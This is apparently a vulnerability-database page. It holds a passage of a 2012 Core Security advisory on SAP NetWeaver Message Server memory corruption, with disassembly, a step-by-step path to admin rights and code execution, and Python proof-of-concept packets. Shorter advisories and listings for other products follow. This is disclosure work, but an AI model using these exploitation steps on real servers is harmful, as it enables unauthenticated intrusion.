[esi+20h], ebx ; iflag=0xc, flag=1 => add 1 to [esi+0x20] .text:0044D39A adc [esi+24h], ecx [...] -----/ And the following code excerpt is always executed within the '_MsJ2EE_AddStatistics' function, providing two more memory corruption primitives: /----- .text:0044D3B7 add [esi], ebx ;add 1 to [esi] .text:0044D3B9 adc dword ptr [esi+4], 0 .text:0044D3BD mov eax, [edi+MSJ2EE_HEADER.totallength] ;MSJ2EE_HEADER.totallength is fully controlled by the attacker .text:0044D3C0 cdq .text:0044D3C1 add [esi+8], eax ;add an arbitrary number to [esi+8] -----/ This memory corruption vulnerability can be used by remote unauthenticated attackers to execute arbitrary code on vulnerable installations of SAP Netweaver, but it can also be abused to modify the internal state of the vulnerable service in order to gain administrative privileges within the SAP Netweaver Message Server. A client connected to the Message Server may have administrative privileges or not. The Message Server holds a structure of type 'MSADM_s' for each connected client, which contains information about that very connection. Relevant parts of the 'MSADM_s' struct type are shown below: /----- 00000000 MSADM_s struc ; (sizeof=0x538, standard type) 00000000 ; XREF: .data:dummy_clientr 00000000 client_type dd ? ; enum MS_CLIENT_TYPE 00000004 stat dd ? ; enum MS_STAT 00000008 connection_ID dd ? 0000000C status db ? 0000000D dom db ? ; XREF: MsSFillCon+3Cw 0000000E admin_allowed db ? 0000000F db ? ; undefined 00000010 name dw 40 dup(?) [...] 00000534 _padding db 4 dup(?) 00000538 MSADM_s ends -----/ The 'admin_allowed' field at offset 0x0E is a boolean value that indicates whether the connected client has administrative privileges or not. When a new client connects, the 'MsSLoginClient' function of the Message Server sets the proper value for the 'admin_allowed' field in the 'MSADM_s' struct instance associated with that client: /----- .text:004230DC loc_4230DC: ; CODE XREF: MsSLoginClient+AAAj .text:004230DC ; MsSLoginClient+B26j .text:004230DC cmp byte ptr [edi+0Eh], 0 ; privileged client? .text:004230E0 jnz short loc_4230EA ; if yes, jump .text:004230E2 mov al, byte ptr ms_admin_allowed ; otherwise, grab the value of the "ms_admin_allowed" global variable... .text:004230E7 mov [edi+0Eh], al ; ...and save it to MSADM_s.admin_allowed -----/ So if we manage to overwrite the value of the 'ms_admin_allowed' global variable with a value different than 0, then we can grant administrative privileges to our unprivileged connections. In SAP Netweaver 'msg_server.exe' v7200.70.18.23869, the 'ms_admin_allowed' global variable is located at '0x008f17f0': /----- .data:008F17F0 ; int ms_admin_allowed .data:008F17F0 ms_admin_allowed dd ? ; DATA XREF: MsSSetMonitor+7Ew .data:008F17F0 ; MsSLoginClient+B62r -----/ And the 'j2ee_stat_services' global array, which is the array that can be indexed outside its bounds, is located at '0x0090b9e0': /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... -----/ So, by providing 'MSJ2EE_HEADER.serviceid == 0x038E3315', we will be targeting '0x008F17C8' as the base address for memory corruption. Having in mind the different memory corruption primitives based on combinations of 'flag/iflag' fields described above, by specifying 'iflag == 0xC' and 'flag == 0x2' in our Message Server packet we will be able to add 1 to '[0x008F17C8+0x28]', effectively overwriting the contents of '0x008F17F0' ('ms_admin_allowed'). After overwriting 'ms_admin_allowed', all of our future connections will have administrative privileges within the Message Server. After gaining administrative privileges for our future connections, there are at least two possible paths of exploitation: 1. Of course it is not mandatory to have administrative privileges in order to overwrite function pointers, but considering the limitation of targetable addresses imposed by the little granularity of the memory corruption, some of the most handy-to-exploit function pointers happened to be accessible just for administrative connections. 2. Modify the configuration and behavior of the server. That includes changing Message Server's runtime parameters and enabling Monitor Mode in the affected server. 8.1.1. *Gaining remote code execution by overwriting function pointers* Having in mind that the granularity of the memory addresses that can be targeted for memory corruption is not that flexible (0x48 bytes) and the limited memory corruption primitives available, it takes some effort to find a function pointer that can be overwritten with a useful value and which can be later triggered with a network packet. One possibility is to overwrite one of the function pointers which are in charge of handling the modification of Message Server parameters: /----- .data:0087DED0 ; SHMPRF_CHANGEABLE_PARAMETER ms_changeable_parameter[58] ; function pointers associated to the modification of the "ms/max_sleep" parameter .data:0087DED0 ms_changeable_parameter SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_sleep, \ .data:0087DED0 offset MsSTestInteger, \ ; "rdisp/TRACE_PATTERN_2" .data:0087DED0 offset MsSSetMaxSleep> ; function pointers associated to the modification of the "ms/max_vhost" parameter .data:0087DED0 SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_vhost, \ .data:0087DED0 offset MsSTestInteger, \ ;<-- we can overwrite this one .data:0087DED0 offset MsSSetMaxVirtHost> [...] -----/ By providing 'MSJ2EE_HEADER.serviceid == 0x038E1967' we can target '0x0087DED8' as the base address for memory corruption. In this case we can use the memory corruption primitive at address '0x0044D3C1' that always gets executed, which will allow us to add an arbitrary number (the value of 'MSJ2EE_HEADER.totallength') to '[0x0087DED8+8]' effectively overwriting the function pointer shown above ('ms_changeable_parameter[1].set'). After that we need to send a 'MS_SET_PROPERTY' request, specifying 'ms/max_vhost' as the name of the property to be changed. This 'MS_SET_PROPERTY' packet will make our overwritten function pointer to be called from the 'MsSChangeParam' function: /----- .text:00404DB3 loc_404DB3: ; CODE XREF: MsSChangeParam+CDj .text:00404DB3 lea esi, [edi+edi*2] .text:00404DB6 mov edi, [ebp+pvalue] .text:00404DB9 add esi, esi .text:00404DBB mov edx, ms_changeable_parameter.test[esi+esi] .text:00404DC2 add esi, esi .text:00404DC4 push edi .text:00404DC5 push pname .text:00404DC6 call edx ; call our overwritten function pointer -----/ 'MS_SET_PROPERTY' packets will be ignored by the Message Server if the requesting client does not have administrative privileges, so it is necessary to gain administrative privileges as explained above before using the memory corruption vulnerability to overwrite one of the function pointers in the 'ms_changeable_parameter' global array. 8.1.2. *Modify the configuration and behavior of the server* After gaining administrative privileges for our connections, it is possible to perform 'MS_SET_PROPERTY' packets against the Message Server in order to modify its configuration and behavior. That makes possible, for example, to add virtual hosts to the load balancer, or to enable Monitor Mode [3] (transaction SMMS) on the affected server. Enabling Monitor Mode takes two steps: 1. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/monitor"', property 'value == 1'. 2. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/admin_port"', property 'value == 3535' (or any other arbitrary port number). After sending the second 'MS_SET_PROPERTY' packet, the SAP Netweaver Message Server will start listening on the specified port, waiting for connections from instances of the msmon.exe monitoring program [4]. The following python code can be used to trigger the vulnerability: /----- def send_attack(connection): print "[*] Sending crash packet" crash = '**MESSAGE**\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x0d' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd crash+= "ABCDEFGH"+"\x01\x00\x00\x00"+"MNOPQRSTUVWXYZ0123"+"\x01"+"56789abcd" crash+= "\x00\x00\x00\x01" crash+= "\xff\xff\xff\xff" crash+= "\x00\x00\x00\x00" send_packet(connection, crash) print "[*] Crash sent !" -----/ 8.2. Malicious packets are processed by the vulnerable function 'WRITE_C' in the 'msg_server.exe' module. The following python code can be used to trigger the vulnerability: /----- def send_attack(connection): print "[*] Sending crash packet" crash = '**MESSAGE**\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x05' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd crash+= "AD-EYECATCH\x00" crash+= "\x01\x01" crash+= "%11d" % 104 crash+= "%11d" % 1 crash+= "\x15\x00\x00\x00" crash+= "\x20\x00\x00\xc8" crash+= "LALA" + ' '*(20-4) crash+= "LOLO" + ' '*(40-4) crash+= " "*36 send_packet(connection, crash) print "[*] Crash sent !" -----/ 9. *Report Timeline* . 2012-12-10: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for January 22nd, 2013. 2012-12-10: Core sends an advisory draft with technical details and a PoC. 2012-12-11: The SAP team confirms the reception of the issue. 2012-12-21: SAP notifies that they concluded the analysis of the reported issues and confirms two out of the five vulnerabilities. Vendor also notifies that the other three reported issues were already fixed in February, 2012. Vendor also notifies that the necessary code changes are being done and extensive tests will follow. The corresponding security note and patches are planned to be released on the Security Patch Day in Feb 12th 2013. 2012-12-21: Core re-schedules the advisory publication for Feb 12th, 2013. 2012-12-28: SAP notifies Core that they will be contacted if tests fails in order to re-schedule the advisory publication. 2013-01-22: First release date missed. 2013-01-28: SAP notifies that they are still confident with releasing a security note and patches on Feb 12th as planned. 2013-01-29: Core acknowledges receiving the information and notifies that everything is ready for public disclosing on Feb 12th. Core also asks additional information regarding the patched vulnerabilities mentioned in [2012-12-21], including links to security bulletin, CVEs, and patches in order to verify if those patches effectively fix the reported flaws. 2013-02-01: SAP notifies that the patched vulnerabilities mentioned in [2012-12-21] were reported in [5] and no CVE were assigned to them. Those vulnerabilities seems to be related to ZDI advisories [6], [7], [8]. 2013-02-06: Core notifies that the patched vulnerabilities will be removed from the advisory and asks additional information regarding the affected and patched version numbers. 2013-02-01: SAP notifies that the security note 1800603 will be released and that note will provide further information regarting this vulnerability. 2013-02-13: Advisory CORE-2012-1128 published. 10. *References* [1] http://www.sap.com/platform/netweaver/index.epx. [2] SAP Security note Feb 2013 https://service.sap.com/sap/support/notes/1800603. [3] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm. [4] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm. [5] SAP Security notes Feb 2012 https//service.sap.com/sap/support/notes/1649840. [6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/. [7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/. [8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ZDI-12-111 : SAP Netweaver ABAP msg_server.exe Opcode 0x43 Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-111 June 28, 2012 - -- CVE ID: - -- CVSS: 10, AV:N/AC:L/Au:N/C:C/I:C/A:C - -- Affected Vendors: SAP - -- Affected Products: SAP NetWeaver - -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 12407. - -- Vendor Response: SAP has issued an update to correct this vulnerability. More details can be found at: http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1 0-eea7-ceb666083a6a#section40 - -- Disclosure Timeline: 2011-10-28 - Vulnerability reported to vendor 2012-06-28 - Coordinated public release of advisory - -- Credit: This vulnerability was discovered by: * e6af8de8b1d4b2b6d5ba2610cbf9cd38 - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBT+yszFVtgMGTo1scAQLv/wf+MRiEiaRsMyaVgI7MTDUo9sXprBObQ6QM yIlVyGLjwEQrO9KsUMlCj/pfLkgjcHYpCNxcrB0+6ZgtphkIQhrB3w0sj/fjRyn1 Vuugvjazu8xffqujZ2ymaQHR+toaQjeKrtWvVbaTdJI6EFuUi+qT5MrZQfRWhE2X uqXdLphMXYH+SRhNtD+zJhxg4U4emVvirqNJa9YLwFE0UpxGRksKCB4Cx89o2QWE NiC9bPznAVCMOBh/R/8uROXkg1Jg9YBhEu7wzJY95Yfsl4oWpSO0cQOCF0WAWiHi TsUy3xHAjW7gMz7v/QMleok6C/7safK/7qjJRMDrGUQO1csmlZUkAg== =FVga -----END PGP SIGNATURE-----
var-201208-0222 Multiple stack-based buffer overflows in msg_server.exe in SAP NetWeaver ABAP 7.x allow remote attackers to cause a denial of service (crash) and execute arbitrary code via a (1) long parameter value, (2) crafted string size field, or (3) long Parameter Name string in a package with opcode 0x43 and sub opcode 0x4 to TCP port 3900. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP Netweaver ABAP. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. NetWeaver ABAP is prone to a denial-of-service vulnerability
var-202005-0008 Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Multiple heap-based buffer overflow vulnerabilities exist caused by a lack of proper validation of the length of user-supplied data, which may allow remote code execution. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Advantech WebAccess/SCADA. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of IOCTL 0x0000791d in DATACORE.exe. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess is a browser-based SCADA software package for monitoring, data acquisition, and visualization. It is used to automate complex industrial processes when remote operation is required
var-202007-0395 Advantech iView, versions 5.6 and prior, contains multiple SQL injection vulnerabilities that are vulnerable to the use of an attacker-controlled string in the construction of SQL queries. An attacker could extract user credentials, read or modify information, and remotely execute code. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Advantech iView. Authentication is not required to exploit this vulnerability.The specific flaw exists within the processing of calls to the retrieveActiveTrapCount method of the TrapTable class. When parsing the search_hostname HTTP parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. Advantech iView is a device management application provided by Advantech
var-202106-0542 A CWE-287: Improper Authentication vulnerability exists in PowerLogic PM55xx, PowerLogic PM8ECC, PowerLogic EGX100 and PowerLogic EGX300 (see security notification for version infromation) that could cause loss of connectivity to the device via Modbus TCP protocol when an attacker sends a specially crafted HTTP request. plural Schneider Electric The product contains authentication vulnerabilities.Service operation interruption (DoS) It may be in a state
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
jvndb-2024-000109 baserCMS plugin "BurgerEditor" vulnerable to directory listing 2024-10-10T14:57+09:00 2024-11-06T14:45+09:00
jvndb-2024-012017 Trend Micro Deep Security 20 Agent for Windows vulnerable to improper access control 2024-11-06T11:00+09:00 2024-11-06T11:00+09:00
jvndb-2024-011833 Incorrect authorization vulnerability in OMRON Sysmac Studio 2024-11-05T15:29+09:00 2024-11-05T15:29+09:00
jvndb-2024-011747 Command injection vulnerability in Trend Micro Cloud Edge 2024-11-01T14:28+09:00 2024-11-01T14:28+09:00
jvndb-2024-011744 REST-APIs unintentionally enabled in Century Systems FutureNet NXR series routers 2024-11-01T13:49+09:00 2024-11-01T13:49+09:00
jvndb-2024-000117 Stack-based buffer overflow vulnerability in multiple Ricoh laser printers and MFPs which implement Web Image Monitor 2024-10-31T16:44+09:00 2024-10-31T16:44+09:00
jvndb-2024-000116 Hikvision network camera security enhancement to prevent cleartext transmission of Dynamic DNS credentials 2024-10-30T15:07+09:00 2024-10-30T15:07+09:00
jvndb-2024-011256 Multiple vulnerabilities in Sharp and Toshiba Tec MFPs 2024-10-28T17:33+09:00 2024-10-28T17:33+09:00
jvndb-2024-000115 Chatwork Desktop Application (Windows) uses a potentially dangerous function 2024-10-28T14:29+09:00 2024-10-28T14:29+09:00
jvndb-2024-000112 MUSASI version 3 performing authentication on client-side 2024-10-18T14:40+09:00 2024-10-25T16:55+09:00
jvndb-2024-000113 N-LINE vulnerable to HTML injection 2024-10-18T14:48+09:00 2024-10-25T16:48+09:00
jvndb-2024-000114 Multiple vulnerabilities in baserCMS 2024-10-25T15:07+09:00 2024-10-25T15:07+09:00
jvndb-2024-004623 Multiple products from Check Point Software Technologies vulnerable to information disclosure 2024-07-29T10:23+09:00 2024-10-24T16:37+09:00
jvndb-2024-000111 SHIRASAGI vulnerable to path traversal 2024-10-16T14:12+09:00 2024-10-23T17:35+09:00
jvndb-2024-010802 Multiple SQL injection vulnerabilities in Trend Micro Deep Discovery Inspector 2024-10-22T13:02+09:00 2024-10-22T13:02+09:00
jvndb-2024-000102 Multiple NTT EAST Home GateWay/Hikari Denwa routers fail to restrict access permissions 2024-09-24T16:00+09:00 2024-10-18T11:02+09:00
jvndb-2024-000110 Multiple vulnerabilities in Exment 2024-10-11T14:13+09:00 2024-10-11T14:13+09:00
jvndb-2024-000104 MF Teacher Performance Management System vulnerable to cross-site scripting 2024-09-27T15:00+09:00 2024-10-10T11:14+09:00
jvndb-2024-009667 Multiple vulnerabilities in JTEKT ELECTRONICS Kostac PLC Programming Software 2024-10-03T13:42+09:00 2024-10-03T13:42+09:00
jvndb-2024-000108 Apache Tomcat improper handling of TLS handshake process data 2024-10-01T17:51+09:00 2024-10-01T17:51+09:00
jvndb-2024-009498 Vulnerability in Cosminexus 2024-10-01T16:01+09:00 2024-10-01T16:01+09:00
jvndb-2024-000107 RevoWorks Cloud vulnerable to unintended process execution 2024-09-30T15:17+09:00 2024-09-30T15:17+09:00
jvndb-2024-003932 File Permissions Vulnerability in Hitachi Ops Center Common Services 2024-09-30T14:15+09:00 2024-09-30T14:15+09:00
jvndb-2024-000105 Multiple vulnerabilities in Smart-tab 2024-09-30T14:14+09:00 2024-09-30T14:14+09:00
jvndb-2024-009396 SNMP service is enabled by default in Sharp NEC Display Solutions projectors 2024-09-30T12:46+09:00 2024-09-30T12:46+09:00
jvndb-2024-003049 Multiple vulnerabilities in KEYENCE KV STUDIO, KV REPLAY VIEWER, and VT5-WX15/WX12 2024-04-01T12:31+09:00 2024-09-25T13:51+09:00
jvndb-2024-000089 WindLDR and WindO/I-NV4 store sensitive information in cleartext 2024-08-29T15:08+09:00 2024-09-24T17:14+09:00
jvndb-2024-000103 The installer of e-Tax software(common program) vulnerable to privilege escalation 2024-09-24T16:12+09:00 2024-09-24T16:12+09:00
jvndb-2024-000101 Multiple vulnerabilities in PLANEX COMMUNICATIONS network devices 2024-09-24T15:26+09:00 2024-09-24T15:26+09:00
jvndb-2024-003068 Multiple vulnerabilities in Cente middleware 2024-04-05T15:36+09:00 2024-09-24T15:00+09:00